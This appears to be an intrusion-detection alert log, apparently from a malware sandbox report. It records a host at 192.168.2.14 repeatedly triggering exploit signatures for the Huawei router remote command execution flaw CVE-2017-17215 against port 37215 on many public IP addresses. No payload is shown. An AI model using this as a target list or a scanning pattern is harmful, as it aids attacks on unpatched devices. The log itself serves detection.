                                            06/14/24-10:44:00.342745TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4975037215192.168.2.14156.132.246.61
                                            06/14/24-10:44:16.717738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5140037215192.168.2.14156.232.193.35
                                            06/14/24-10:44:35.181306TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5749837215192.168.2.1441.29.143.146
                                            06/14/24-10:44:18.766389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3730237215192.168.2.1441.149.63.217
                                            06/14/24-10:43:39.789315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5134037215192.168.2.1441.157.26.110
                                            06/14/24-10:43:34.677130TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3946637215192.168.2.14197.233.30.78
                                            06/14/24-10:43:50.114018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3281637215192.168.2.1441.181.72.169
                                            06/14/24-10:44:20.828178TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4400437215192.168.2.14156.20.126.42
                                            06/14/24-10:44:16.736520TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5485837215192.168.2.14156.1.26.66
                                            06/14/24-10:43:58.277039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5095037215192.168.2.1441.181.65.17
                                            06/14/24-10:43:56.230936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5182237215192.168.2.14197.149.189.235
                                            06/14/24-10:44:35.182051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5427837215192.168.2.1441.174.68.209
                                            06/14/24-10:43:50.114075TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3293637215192.168.2.14197.170.176.187
                                            06/14/24-10:44:00.321459TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4760037215192.168.2.1441.195.118.219
                                            06/14/24-10:43:36.718293TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5183237215192.168.2.14156.183.202.248
                                            06/14/24-10:43:56.243137TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5188437215192.168.2.14197.18.130.232
                                            06/14/24-10:44:06.471551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5179437215192.168.2.14197.3.128.165
                                            06/14/24-10:43:34.678555TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4236837215192.168.2.14156.49.114.156
                                            06/14/24-10:43:45.987448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4410837215192.168.2.1441.33.123.135
                                            06/14/24-10:43:43.941229TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4484437215192.168.2.14156.31.108.208
                                            06/14/24-10:44:33.150302TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4838037215192.168.2.14156.129.240.50
                                            06/14/24-10:44:24.944650TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4521237215192.168.2.14156.2.210.171
                                            06/14/24-10:44:00.343039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5457437215192.168.2.14156.118.25.11
                                            06/14/24-10:44:08.519069TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5011437215192.168.2.1441.148.161.45
                                            06/14/24-10:43:39.791784TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3765637215192.168.2.1441.191.128.5
                                            06/14/24-10:44:35.181169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5566837215192.168.2.1441.62.22.139
                                            06/14/24-10:43:50.073403TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4155237215192.168.2.14197.166.39.177
                                            06/14/24-10:44:16.718700TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5854837215192.168.2.14156.151.101.143
                                            06/14/24-10:43:34.663794TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5042237215192.168.2.1441.122.39.98
                                            06/14/24-10:44:18.777820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5758037215192.168.2.1441.28.186.226
                                            06/14/24-10:43:43.967706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5832837215192.168.2.14197.153.235.101
                                            06/14/24-10:44:14.670590TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4061637215192.168.2.14156.254.206.176
                                            06/14/24-10:44:18.775594TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3347237215192.168.2.14197.193.145.20
                                            06/14/24-10:43:54.200625TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4402437215192.168.2.14197.81.146.233
                                            06/14/24-10:43:50.073548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4362437215192.168.2.14156.49.0.239
                                            06/14/24-10:44:18.763235TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4906837215192.168.2.14197.127.212.3
                                            06/14/24-10:43:39.808260TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5068637215192.168.2.1441.232.182.83
                                            06/14/24-10:43:54.183757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4252237215192.168.2.1441.14.49.58
                                            06/14/24-10:43:45.988782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5753237215192.168.2.14156.219.119.81
                                            06/14/24-10:43:45.989569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4247237215192.168.2.14197.180.229.242
                                            06/14/24-10:44:20.805206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4130037215192.168.2.14197.62.146.247
                                            06/14/24-10:43:45.991970TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5720837215192.168.2.1441.12.183.117
                                            06/14/24-10:44:00.325705TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4348837215192.168.2.14197.66.224.32
                                            06/14/24-10:43:56.242939TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4599037215192.168.2.14197.26.55.175
                                            06/14/24-10:44:33.152333TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5137837215192.168.2.1441.187.213.123
                                            06/14/24-10:43:41.907162TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4243037215192.168.2.14156.91.15.151
                                            06/14/24-10:44:06.471240TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5848037215192.168.2.14156.15.194.222
                                            06/14/24-10:43:50.110699TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5200437215192.168.2.14156.15.76.253
                                            06/14/24-10:43:58.275058TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3555237215192.168.2.1441.250.170.41
                                            06/14/24-10:44:16.719126TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4425837215192.168.2.1441.115.169.160
                                            06/14/24-10:44:20.806371TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3549237215192.168.2.1441.150.82.22
                                            06/14/24-10:44:29.024051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3717637215192.168.2.1441.98.123.152
                                            06/14/24-10:44:35.180666TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4610837215192.168.2.1441.210.96.155
                                            06/14/24-10:43:54.202331TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5304837215192.168.2.1441.244.159.254
                                            06/14/24-10:44:14.681807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4155237215192.168.2.1441.204.89.195
                                            06/14/24-10:43:36.704557TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4105237215192.168.2.1441.203.157.254
                                            06/14/24-10:44:00.334682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3430437215192.168.2.1441.183.227.125
                                            06/14/24-10:44:24.916765TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3835037215192.168.2.14156.47.141.19
                                            06/14/24-10:44:00.342366TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5581637215192.168.2.14197.208.65.153
                                            06/14/24-10:44:24.943255TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3712837215192.168.2.1441.246.107.153
                                            06/14/24-10:43:37.772401TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5978437215192.168.2.14156.183.116.44
                                            06/14/24-10:44:02.383911TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3324037215192.168.2.14197.100.224.122
                                            06/14/24-10:44:31.094449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5471637215192.168.2.1441.96.56.110
                                            06/14/24-10:44:24.942153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3367237215192.168.2.14156.92.222.79
                                            06/14/24-10:44:33.150344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4440437215192.168.2.14197.146.118.109
                                            06/14/24-10:43:52.149174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3939237215192.168.2.14156.122.12.191
                                            06/14/24-10:43:48.028748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5969237215192.168.2.1441.217.247.76
                                            06/14/24-10:44:12.624842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4176637215192.168.2.1441.77.89.215
                                            06/14/24-10:44:02.367788TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4470037215192.168.2.1441.47.42.69
                                            06/14/24-10:44:08.505222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4913037215192.168.2.1441.65.184.242
                                            06/14/24-10:44:16.737758TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5018837215192.168.2.14156.27.247.34
                                            06/14/24-10:43:39.792224TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3654837215192.168.2.14156.95.217.92
                                            06/14/24-10:43:39.792960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3773637215192.168.2.14156.216.100.222
                                            06/14/24-10:43:39.788680TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3566637215192.168.2.14197.83.179.79
                                            06/14/24-10:44:04.410540TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4411837215192.168.2.14156.36.209.203
                                            06/14/24-10:44:18.762202TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4981237215192.168.2.1441.132.173.213
                                            06/14/24-10:43:45.966933TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5100837215192.168.2.14197.245.239.115
                                            06/14/24-10:44:26.978044TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4736237215192.168.2.14197.85.112.15
                                            06/14/24-10:43:50.074789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4080237215192.168.2.14156.162.146.101
                                            06/14/24-10:44:14.687651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5607237215192.168.2.1441.104.68.183
                                            06/14/24-10:43:48.030002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5363837215192.168.2.14156.103.180.3
                                            06/14/24-10:43:43.944385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3675237215192.168.2.1441.102.11.71
                                            06/14/24-10:44:06.449869TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4363837215192.168.2.14156.172.200.191
                                            06/14/24-10:43:48.016156TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6052637215192.168.2.14156.88.80.43
                                            06/14/24-10:44:31.082447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4439837215192.168.2.14156.42.76.40
                                            06/14/24-10:44:10.542550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3424437215192.168.2.1441.125.147.201
                                            06/14/24-10:43:45.969179TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3869837215192.168.2.14197.213.251.100
                                            06/14/24-10:44:24.932507TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5921237215192.168.2.14197.18.220.115
                                            06/14/24-10:43:34.663769TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4240837215192.168.2.1441.201.118.253
                                            06/14/24-10:44:33.132186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4052237215192.168.2.14197.89.14.185
                                            06/14/24-10:44:22.880103TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3816237215192.168.2.14197.151.117.71
                                            06/14/24-10:44:16.732216TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4716237215192.168.2.14156.233.188.116
                                            06/14/24-10:43:41.845520TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4652237215192.168.2.14197.69.99.166
                                            06/14/24-10:44:18.762963TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4715237215192.168.2.1441.129.13.2
                                            06/14/24-10:44:04.420552TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5168037215192.168.2.14156.185.155.240
                                            06/14/24-10:44:29.025269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5989237215192.168.2.14156.172.121.255
                                            06/14/24-10:44:29.014955TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5602637215192.168.2.14156.253.139.230
                                            06/14/24-10:44:02.368978TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5977637215192.168.2.1441.3.215.186
                                            06/14/24-10:44:35.177546TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3735837215192.168.2.14197.58.217.203
                                            06/14/24-10:44:00.341269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4666037215192.168.2.14197.135.240.168
                                            06/14/24-10:44:35.177325TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3722837215192.168.2.14197.75.14.248
                                            06/14/24-10:44:10.543803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4375837215192.168.2.14156.69.186.75
                                            06/14/24-10:44:31.087167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5918637215192.168.2.14197.5.180.155
                                            06/14/24-10:44:04.407834TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5386637215192.168.2.14197.236.59.175
                                            06/14/24-10:43:34.661783TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4673037215192.168.2.14156.44.219.206
                                            06/14/24-10:44:04.424987TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5344037215192.168.2.1441.4.50.91
                                            06/14/24-10:44:31.088850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4759637215192.168.2.14197.117.10.242
                                            06/14/24-10:43:50.072247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5207037215192.168.2.1441.82.220.213
                                            06/14/24-10:43:50.074908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3565837215192.168.2.1441.49.233.83
                                            06/14/24-10:44:00.341180TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5970037215192.168.2.14156.99.241.153
                                            06/14/24-10:44:31.081603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3514237215192.168.2.14156.105.159.197
                                            06/14/24-10:44:10.563067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5685837215192.168.2.14156.180.78.3
                                            06/14/24-10:43:54.185234TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3293437215192.168.2.14197.176.211.233
                                            06/14/24-10:43:48.032300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3827237215192.168.2.14197.238.162.161
                                            06/14/24-10:44:04.421314TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4489637215192.168.2.1441.50.204.169
                                            06/14/24-10:43:41.849353TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3484837215192.168.2.14197.163.86.33
                                            06/14/24-10:43:50.111811TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5450637215192.168.2.14197.70.161.217
                                            06/14/24-10:43:41.846132TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4723237215192.168.2.14197.84.144.33
                                            06/14/24-10:44:26.979919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5883237215192.168.2.14156.60.247.178
                                            06/14/24-10:44:31.084179TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4013237215192.168.2.14156.222.6.83
                                            06/14/24-10:44:10.545502TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4789237215192.168.2.1441.95.252.86
                                            06/14/24-10:44:08.502851TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4669637215192.168.2.1441.93.214.222
                                            06/14/24-10:43:39.791815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5586637215192.168.2.1441.125.30.145
                                            06/14/24-10:44:06.453112TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4970637215192.168.2.14156.225.160.213
                                            06/14/24-10:44:08.521739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5536637215192.168.2.1441.136.89.196
                                            06/14/24-10:44:33.147902TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4587037215192.168.2.14197.129.20.19
                                            06/14/24-10:44:18.776090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3689637215192.168.2.1441.155.142.76
                                            06/14/24-10:44:06.451483TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5537037215192.168.2.14156.50.115.169
                                            06/14/24-10:43:56.245020TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4159637215192.168.2.14156.199.174.241
                                            06/14/24-10:44:14.683065TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4658437215192.168.2.1441.228.236.142
                                            06/14/24-10:43:41.896584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4030437215192.168.2.14197.135.208.50
                                            06/14/24-10:43:34.663406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5959037215192.168.2.14197.193.225.65
                                            06/14/24-10:44:10.565084TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5289637215192.168.2.1441.71.156.224
                                            06/14/24-10:43:43.941887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5547237215192.168.2.14197.201.142.176
                                            06/14/24-10:43:34.678796TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3428237215192.168.2.14197.107.104.42
                                            06/14/24-10:43:52.150424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4666037215192.168.2.1441.58.87.72
                                            06/14/24-10:43:36.717586TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4062237215192.168.2.14156.208.48.118
                                            06/14/24-10:43:39.791847TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5506437215192.168.2.14197.53.126.156
                                            06/14/24-10:44:00.326276TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4712437215192.168.2.1441.188.151.82
                                            06/14/24-10:43:50.073965TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5545637215192.168.2.1441.110.131.61
                                            06/14/24-10:43:36.700733TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5328037215192.168.2.14197.194.242.40
                                            06/14/24-10:44:00.339262TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4832037215192.168.2.14197.79.214.222
                                            06/14/24-10:43:52.163103TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3884437215192.168.2.1441.85.186.208
                                            06/14/24-10:44:22.861815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3517637215192.168.2.1441.231.239.122
                                            06/14/24-10:44:02.367606TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5498837215192.168.2.1441.43.184.219
                                            06/14/24-10:43:36.705287TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5576837215192.168.2.14197.138.17.253
                                            06/14/24-10:43:39.790121TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4584637215192.168.2.14197.178.23.194
                                            06/14/24-10:43:41.850299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3872437215192.168.2.1441.145.16.189
                                            06/14/24-10:44:06.471210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4812837215192.168.2.14156.218.246.18
                                            06/14/24-10:44:29.021936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5934037215192.168.2.14156.220.153.213
                                            06/14/24-10:43:36.727419TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3812437215192.168.2.1441.39.255.122
                                            06/14/24-10:43:34.676617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5057037215192.168.2.14197.171.154.221
                                            06/14/24-10:43:56.225677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4838637215192.168.2.14197.186.202.59
                                            06/14/24-10:44:06.472073TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5520437215192.168.2.1441.8.163.32
                                            06/14/24-10:44:02.365874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5003037215192.168.2.14156.56.114.170
                                            06/14/24-10:44:16.737507TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4144037215192.168.2.14156.32.202.28
                                            06/14/24-10:43:45.968979TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3697637215192.168.2.14156.43.188.154
                                            06/14/24-10:44:02.365274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4049837215192.168.2.14197.123.8.40
                                            06/14/24-10:44:24.943525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4664437215192.168.2.1441.237.89.157
                                            06/14/24-10:44:12.615177TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4055637215192.168.2.1441.82.92.191
                                            06/14/24-10:44:00.337203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4843237215192.168.2.1441.196.75.2
                                            06/14/24-10:43:54.185490TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4958837215192.168.2.14156.162.225.223
                                            06/14/24-10:44:16.717457TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3666037215192.168.2.14197.91.80.15
                                            06/14/24-10:44:00.344538TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4822837215192.168.2.14197.18.178.21
                                            06/14/24-10:43:50.111452TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3933437215192.168.2.1441.102.16.186
                                            06/14/24-10:44:12.616498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5044437215192.168.2.1441.138.165.111
                                            06/14/24-10:44:26.999967TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4437237215192.168.2.14156.128.245.49
                                            06/14/24-10:43:36.717459TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4641637215192.168.2.14156.202.150.224
                                            06/14/24-10:44:22.880375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5096037215192.168.2.1441.105.250.192
                                            06/14/24-10:44:35.182784TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5879237215192.168.2.14197.83.244.78
                                            06/14/24-10:44:10.546806TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4821237215192.168.2.14156.202.236.59
                                            06/14/24-10:44:08.519886TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5015037215192.168.2.14156.87.187.206
                                            06/14/24-10:44:26.976929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4695837215192.168.2.14197.121.16.78
                                            06/14/24-10:43:39.808748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5653237215192.168.2.14197.131.140.249
                                            06/14/24-10:44:10.543848TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3842237215192.168.2.14156.156.170.120
                                            06/14/24-10:43:36.703434TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4358037215192.168.2.14156.83.22.114
                                            06/14/24-10:43:58.275123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5806437215192.168.2.14156.150.136.177
                                            06/14/24-10:44:14.666494TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5922037215192.168.2.14197.22.48.178
                                            06/14/24-10:43:58.275927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5293637215192.168.2.14156.252.93.202
                                            06/14/24-10:43:52.150016TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5439437215192.168.2.14197.4.236.191
                                            06/14/24-10:43:45.991250TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5110037215192.168.2.14156.214.116.180
                                            06/14/24-10:44:02.364668TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3359637215192.168.2.14156.169.148.135
                                            06/14/24-10:44:06.452846TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5766037215192.168.2.14156.183.27.49
                                            06/14/24-10:44:24.915243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3453237215192.168.2.14156.79.255.58
                                            06/14/24-10:44:24.917802TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4683837215192.168.2.14156.75.76.33
                                            06/14/24-10:44:00.321567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5579037215192.168.2.1441.238.151.104
                                            06/14/24-10:44:04.421287TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5860437215192.168.2.14197.27.106.170
                                            06/14/24-10:44:20.828778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3293637215192.168.2.14156.38.38.164
                                            06/14/24-10:44:26.997466TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4584037215192.168.2.1441.173.107.225
